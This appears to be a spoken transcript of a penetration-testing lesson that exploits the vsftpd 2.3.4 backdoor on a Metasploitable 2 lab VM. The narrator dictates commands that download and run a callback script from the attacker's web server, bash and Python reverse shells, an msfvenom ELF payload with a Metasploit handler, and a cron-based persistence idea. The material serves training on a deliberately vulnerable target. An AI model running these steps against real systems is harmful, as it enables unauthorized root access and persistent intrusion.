All right, continuing to look at Metasploitable 2, we'll go ahead and we'll see what else we can do with it. All right, so we have our mmap scan there, right? So we can cat our mmap scan there. And let's go ahead and let's look at that port 2121 that we found earlier. So let's go ahead and make sure that is still open. mmap tag, or just we'll just cat it like real quick. Excuse me, not make sure that's open, but just cat it. See what it is. Grep tag IA, and we'll say 2121. All right, looks like we do have an FTP port there for Pro FTPD 1.3.1. Again, we can search exploit that. Pro FTPD. And we'll see if that 1.3.1 has any vulnerabilities to it. It doesn't look like it does. Now, does it? So, but we do have this IC 1.3.x remote code execution. We do have 1.3.33c. All right, but it doesn't look like 1.3.1 has a vulnerability that straight up just allows us just to be able to get into it. So let's go ahead and look at that port 21 then. So we'll go ahead and we'll cat and map.txt, and we'll see about that port 21. And we'll grep tech IA for 21. All right, awesome. We do see that also. And we have VSF TPD 2.3.4. We can go ahead and we can look into that like a little bit more. And we also saw before that we had anonymous login within our ports, right? So if we can go ahead and we can grep that just to show it like real quick. Oh, maybe we should. There we go. We'll say ANON. We'll look for anonymous. We do have anonymous login allowed on one of those ports, right? Either 2121 or just 21. But let's go ahead and see if there's anything for VSF TPD 2.3.4. We can search exploit that again. VSF TPD. Let's go ahead and see if we find anything. And we actually do. We have a 2.3.4 like right here and one right here. Let's go ahead and try that Python script. Now, something to notice that, or something to understand, there's some pretty old exploits out there, right? There's some stuff that's pretty old, and your system may not quite work with the older exploits. Okay, you may have to do some things to make it work, things like that. That's a good time to just use Metasploit, right? Depending on what you're doing and things like that, that might be a good time to use that. But if we want to go ahead and pull that down, we do a search exploit, techm. We'll go ahead and we'll grab that. All right, now if we do an ls-tech-la, we can see that that 49757.py is here. We go ahead, we can cat it. We always want to look at what we're running before we run it, right? We just want to aimlessly start running things, okay? And it looks like we're going to be using import telnet, import argument parsing, okay? Input the address of the vulnerable host, okay? So let's see here. Looks like we're putting in some ASCII code, okay? Password if necessary at this line, okay? Password host 6200. So looks like what it's trying to do is it actually goes in and creates, oh, there we go. Okay, so it puts a smiley face behind user, right? So we have a user there, and it puts a smiley face behind user, which then looks like it creates a port 6200, looks like it opens up. So if we go ahead and we mmap tac p 6200, and then we do that for 172.18.0.2, it's closed. Okay. Well, supposedly if we do this like right here, put a smiley face behind the user, it'll be open. So let's go ahead and give that a quick try. Let's just go ahead and just try it first. So we'll try a quick, let's see here. It was an FTP, right? So we'll try the FTP into 172.18.0.2. Okay, name. Let's try, I don't know, Ryan, smiley face. Let's see what happens. Well, we won't put in a password. And let's go ahead and see if we can't get in there now. Okay, looks like it's going to fail. All right, it did fail. Okay. Let's go ahead and try to do that mmap again. Let's see, did that actually even work? Or if not, it did. So it is now open. Okay, just from us reading the script itself, we figured out what the exploit was, right? Just from us looking at the script itself, we figured out if we put a smiley face behind our username, that we're able to open up this port. Now, if we telnet into that port, telnet into 172.18.0.1, and that was on port 6200, or we could, or 0.2, or we could even netcat, right? 172.18.0.2, and we'll say port 6200, right? Can we do that? Did we get anywhere? We did. We are in the system as root. Now, this was known as a smiley face attack. It's an old attack. It's pretty old. It was actually before this version was actually shipped out, someone went in there and actually made this backdoor. All right, so it was more of like kind of like a supply chain almost attack. But yeah, someone went in there, made this backdoor, and someone else obviously found it whenever they went and they looked at what this FTP server was doing and started to look at all the coding and everything like that, reverse engineering it, they saw that, hey, there's a backdoor out here, right? It was called smiley face attack. Okay, so we go ahead, we can exit out of here. Oh, not out of there. Horrible place to exit out of. There we go. We'll go ahead, we'll bring this back up again. Let's go ahead and try to use that Python script now. It's an older Python script. I don't know if we're actually going to be able to run it or not. But let's cd into Metasploitable. All right, and let's try that Python 49757.py. Okay, and it does say that, hey, from telnet import telnet. It is saying that, hey, telnet lib is depreciated slave for removal of Python 3.13. We can actually check out Python tech version. All right, we have 3.12.6. So this might be removed soon. You might have to change up how that exploit's actually running, right? But it does say we just need to add in a host. Now, we did already do it, so I don't know if this is actually going to work again, but we can try 172.18.02, and this should, from what we saw, oh, and it says connection refused, right? So probably because it already did it, right? We already did the exploit. We already ran everything, and so it's obviously not going to try to run it again. But we could try that with a sudo maybe. We can try that. Just because it says connection refused. Oh, we may have gotten it with sudo. Probably because 6200 we're saying like, hey, I don't care. Set exit to quit shell, success shell opened, and we are root. All right, so now we can see that we can utilize things not only with Metasploit, but we can also go out and find different things, right? We can also go out to GitHub and find this. We can read those different GitHub scripts and see, hey, how does this actually ran, right? So we can actually go out onto the internet and say, hey, VSF TPD 2.3.4 exploit, right? We can see, is there actual known exploits for this? So we can say VSF TPD 2.3.4 exploit GitHub. We can see, hey, are there different exploits for this, and do those exploits actually work? Because sometimes either A, you may not be able to use Metasploit, or B, the Metasploit one may not work, and you're like, man, I know this is vulnerable, so let's go ahead and try someone else's, right? Let's go ahead and see what someone else did, right? Someone may have written in Bash, and now you don't have to worry about the Python script, right? You don't have to worry about being Python 2 versus Python 3. You may be able to write your own script off of this, right? You may be able to read this guy's script and say, oh, okay, cool, that's pretty cool. Let's go ahead and write it. So we can either copy this, we can go to raw, and we can just do a wget for it, right? So we'll go ahead and we'll do that. We'll go to raw, we'll grab our URL up here, and all we're going to do is we're just going to say, hey, I just want to do a quick wget for that, like right there. There we go. Now if I cat that, it'll be the same exact thing as what was on the site. Cool. If we run Python, and this one actually has port and command, so this one we're actually just going to set up a command, so we can say Python VSFTPD for 172.18.0.2. Port was 21, right? Normal port, and then we'll say ID. Attempting to trigger the back door, and we get a response of root. All right, cool. So since this was actually running commands, maybe we could do something like an lstack.la. Let's try to put in more than one thing. So we'll put in quotation marks there, just so it knows to grab that whole command. And yeah, we can. Okay, can we look at maybe, where are we like right now, right? What is our present working directory like right now, right? All right, we're just in slash. Can we cd into root, maybe? And do an lstack.la? I probably should have done a cd into root, huh? Probably should have made that multiple commands. I wonder if we can do multiple commands. Let's try it. Let's try something like that where we're doing it. We can. Okay, so we can run multiple commands also. So can we actually drop a bash shell on here and run something? So we already made that bash shell, right? Oh no, excuse me, we did not make a bash shell yet. I made one because I was messing around with stuff. But if I go ahead and cat that shell.sh, all right, that's not even it. Move tech rf shell.sh. We can go ahead and we can actually cat scripts. And if you are on the student VM that you were given, this is in there, these different scripts, all right? If not, you're just going to have to copy and paste what we're doing here. And we can say bash reverse shell, right? And there we go. We have a bash reverse shell like right here. So let's go ahead. Can we run this on there? Let's go ahead and try to do something real quick. Let's make a server. So we'll say Python 3 tech m http.server. We'll say on port 80, right? So we are now running a Python server on port 80 for the web, right? So if we actually go out here and we type in 127.0.0.1. Right, there you go. That's our directory that we are at, right? So we can actually have people call back for things, right? So what we could do is let's create a reverse shell script like real quick. So let's do a quick Sublime. If you are on the student VM, you already have Sublime. If you are on your own VM, you're going to have to download Sublime if you want to. All right, we'll go ahead. We'll call that callback.sh. Very first thing we want to do all the time is put in our shebang line, right? So that /bin bash, which tells the file system what we want to use. We'll go ahead. We'll copy that in there. That is not the full command now, is it? I did not copy that whole thing. It's just going to be bash -i. Dev TCP, okay, and we're just going to say 172.18.0.1, right? That is our IP address, and we'll listen on port 9999. We go ahead and we can save that with a Control S, head back over here, cat callback.sh, and there it is. All right, now let's go ahead and see if we can if we can tell this guy that we want to download this. So we'll go ahead and we will run our command here, our Python command that we just ran. Yep. Okay, we'll say I want to, we're going to cd into /temp. Okay, we're going to do a wget for HTTP 172.18.0.1/callback.sh. Now, if you have this on a different port, such as an 8080, you do have to do something over here with our colon 8080 or some of that calling to a different port, right? Since we're just on port 80, it's automatically going to go over there because of that HTTP. All right, we'll wget that, and then we'll say bash callback.sh, and we'll see, does that actually work? Can we throw 3 commands at this thing at once, right? And let's go ahead and listen. Port 9999. If we can't, we can do this other ways, right? So let's go ahead and see if this works like right here. All right, so it did actually grab it, but it doesn't look like it ran it. That's okay. Let's go ahead and do a quick ls-tech-la on temp and see, did that actually even throw it into temp, right? Did it save it in temp, right? We'll go ahead and we'll try that like real quick. And we do. We have that callback.sh. So let's go ahead and change it to executable maybe. Let's do a change mode +X for temp callback.sh. And then to make sure that that does actually run, we'll go ahead and we'll do another ls-tech-la on there. Now it may fail. We may have been kicked out. We don't know, right? We have no idea, okay? Because it doesn't look like it wants to run, or maybe just because there isn't anything that's sending back to us that something happened. So we'll just press Control C and we'll look at it again and see it. Did that actually change? It did. Okay, it is now executable, right? So let's go ahead and try to run that one more time. So we're just going to say /temp callback.sh. And if it doesn't work this time, that's okay. That is okay. We know we have remote code execution. Okay, so it's saying that dev TCP, that's no such file or directory. That's all right. But this bash script just doesn't work with this one, right? And that's okay. All right. We could try maybe something like which Python, right? Which Python 2, which Python 3. So we can say which Python. We can try that like real quick, see if we get anything back. We could try Python reverse shell. Okay, so we do have user bin Python. We could try which Python 3. That's most likely 2, like right there. And it doesn't look like we would have already got a response. Doesn't look like Python 3 actually exists. All right, so we can do a Python 2 one. So let's go ahead and cat our scripts. Let's try a Python reverse shell. That's Python 3, like right there. I believe I just called it rev. Now you kind of look through them, name them what you want. Let's try reverse python.text. That might be a Python 2, like right there. All right, let's go ahead and move our callback.sh to callback.py. We'll make it a Python script, right? We're going to sublime that callback.py. We'll change this out up here to user bin environment Python 2 or Python, right? And then we can also see where it's actually at over here because we did which Python. We have user bin Python, so maybe we might want to get rid of that environment like right there. All right. And we'll go ahead and we'll copy and paste what we have over here. And it looks like we do have to change the IP address and the port for this one. All right, so IP address, we want to change that 01, and then the port to 9999, because that's going to be our local host, then the local port that we're listening on, right? And let's go ahead and try to, we'll do another one where we put it back into temp. And then we can actually try Python callback.py. We can actually try something like that, okay? Let's go ahead and do that again. It's triggering the back door. I don't have a listener up and running, so that's probably not going to help. NC tech LVMP 999. Let's try that one more time. Let's get re-downloaded and everything again. All right, didn't get anything back with that either. Okay, let's go ahead and make sure that actually got into it. Actually, we'll do a quick change mode +X on temp callback.py. Callback.py, and then we're going to say, we're going to go ahead and we're going to tell it, hey, I want to do a Python callback.py, and we'll see if that works. And if this doesn't work, that's still okay. We're just going to keep going through things, right? And try to go back to its normal directory, not temp directory, but that's okay, right? We're going to keep trying things, okay? Maybe we can make an ELF file or something like that. We can do an MSFVenom, and we can make an ELF file, right? And we'll call it shell or something like that, right? Let's try something like this, where our local port is 1234. We have a shell reverse TCP, okay? We can open up Metasploit down here. And we're just going to keep trying different things. So now we can go ahead and we can try to maybe call for shell, right? Okay, it got shell. We see that 200 out here. Okay, now we do what change mode +X for shell on temp, right? Make that executable again. It's always harder whenever you're working with older systems, it seems like. You would think newer systems are harder. Always seems to be harder whenever working with older ones. Let's go ahead and use exploit multi-handler. And then we'll set our payload to what we have for our MSFVenom up here. Right, we'll set our L host to 172.18.0.1. We'll set our L port to 1234, just like we have up here. Same exact thing as we have up here, right, for our MSFVenom payload. Okay, and we go ahead and stop this, and let's try to call for shell now. But we do actually want to run this exploit multi-handler beforehand, and let's try to call for shell now. So we'll say /temp shell and see if that works. And it still doesn't look like we're getting anything. And oh, actually we did. So it ran that temp shell, and now we are root into /temp, and we can see all the different files that we put in here. We can go ahead and remove those. Callback star, and then we can go ahead and remove that shell. Or we can go ahead and we can make it to where, you know, we have we make a cron job or something like that, a scheduled task that keeps calling back to that shell file to allow us to get in every once a day or once an hour, or every minute, or whatever else, right? So let's go ahead and we can do whatever we want here now. We're root. Who am I, right? We are root. So we can do whatever we want here. Let's go ahead and press Control Z. Yes, and again, just like before, we do a session tag I. We can hop back into that session if we needed to at the end there once we were finished. So this time, like right here, we went ahead, we just looked at another port, we exploited that port, and then we created our own exploit. Well, we utilized MSFVenom to create a payload to be able to upload to that port after downloading something off of GitHub that ran the attack a little bit differently, utilizing Python, and then we utilized an ELF file, and we were able to create a callback to us, right? Now, not every single thing just creates an immediate callback like what we saw before. Like if we were to use Metasploit or something like that, or if we were to use that very first exploit that we utilized, not everything just makes that callback, right? So we may have to go in there and actually mess with it. We may have to go in there and tell it to do different things, or we may have to create our own files and kind of work through it and work through trying to figure out how can we actually exploit something. And realizing what the system's doing, even though you're not getting a callback from that system or you're not receiving the information from that system. Such as in right now we're on Linux, but if we are in Windows, maybe we can't write to that directory, right? That's a big thing. A lot of people, whenever they try to upload things, it goes straight to C System 32 or C Windows System 32, things like that. Well, you probably can't upload to that directory. So maybe we need to make a directory on C temp or C Windows temp or within the user that you are, something like that, right? So hopefully you learned something. I'll talk to you all later.